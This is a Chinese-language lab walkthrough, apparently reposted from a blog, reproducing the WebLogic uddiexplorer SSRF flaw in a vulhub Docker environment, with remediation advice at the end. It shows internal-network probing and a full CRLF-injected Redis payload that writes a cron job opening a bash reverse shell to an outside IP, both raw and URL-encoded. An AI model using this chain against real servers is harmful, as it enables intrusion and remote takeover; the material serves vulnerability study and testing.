0x00簡介

WebLogic是美國Oracle公司出品的一個application server確切的說是一個基于JAVAEE架構的中間件，BEA WebLogic是用于開發、集成、部署和管理大型分布式Web應用、網絡應用和數據庫應用的Java應用服務器。

SSRF簡介

服務端請求偽造(Server-Side Request Forgery),是一種由攻擊者構造形成由服務端發起請求的一個安全漏洞。一般情況下，SSRF攻擊的目標是從外網無法訪問的內部系統。

SSRF形成的原因大都是由于服務端提供了從其他服務器應用獲取數據的功能,且沒有對目標地址做過濾與限制。比如從指定URL地址獲取網頁文本內容,加載指定地址的圖片、文檔等等。

0x01漏洞概述

Weblogic中存在一個SSRF漏洞，利用該漏洞可以發送任意HTTP請求，進而攻擊內網中redis、fastcgi等脆弱組件。

0x02影響范圍

weblogic 版本10.0.2

weblogic 版本10.3.6

0x03環境搭建

1.?本次漏洞使用vulhub-master搭建，vulhub-master下載地址：

https://github.com/vulhub/vulhub

2.?下載完成后使用cd /vulhub-master/weblogic/SSRf/進入到目錄,然后使用docker-compose up -d //啟動實驗靶場

3.在瀏覽器訪問http://ip:7001端口，出現以下頁面表示搭建成功

0x04漏洞復現

1.在url處訪問ip:7001/uddiexplorer/,可查看uddiexplorer應用

2.漏洞位置存在于http://192.168.3.154:7001/uddiexplorer/SearchPublicRegistries.jsp，在表單中隨意輸入內容使用burp抓包，發送到重放模塊

2.1可以看到下圖operator參數,參數的值是url,懷疑可能存在SSRF漏洞

2.2測試是否存在SSRF漏洞,在url后跟端口,把url修改為自己搭建的服務器地址,訪問開放的7001端口,?會返回一個狀態碼

2.3訪問一個不存在的端口會返回連不上服務器

2.4根據報錯的不同，可以進行內網探測。應次漏洞使用docker搭建docker內網172.xx開頭此時通過SSRf探測內網中的redis服務器，發現’172.27.0.2:6379’可以連通

3.?通過以上測試可以得知存在SSRF漏洞。注入HTTP頭然后利用redis反彈shell

Weblogic的SSRF有一個比較大的特點,其雖然是一個”GET/POST”請求,但是我們可以通過傳入%0a%0d來注入換行符,某些服務(如redis)是通過換行符來分隔每條命令,本環境可以通過該SSRF攻擊內網中的redis服務器。

發送三條redis命令，將彈shell腳本寫入/etc/crontab：set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.3.222/7778?0>&1\n\n\n\n”

config set dir /etc/

config set dbfilename crontab

save

4.?使用url編碼，注意：只對特殊符合進行編碼set%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.3.222%2F7778%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0Aconfig%20set%20dir%20%2Fetc%2F%0Aconfig%20set%20dbfilename%20crontab%0Asave%0A

5.使用burp發送，kali監聽1234端口

6.成功反彈shell

0x05修復建議

1.?修復的直接方法是將SearchPublicRegistries.jsp直接刪除；

2.?刪除uddiexplorer文件夾，限制uddiexplorer應用只能內網訪問

參考鏈接：http://www.mchz.com.cn/cn/service/safety-lab/info_26.aspx?&itemid=2128&ezeip=es515pfuwaihdff3mzwbdg==

總結

以上是生活随笔為你收集整理的weblogic中ssrf漏洞修复_Weblogic-SSRF漏洞复现的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。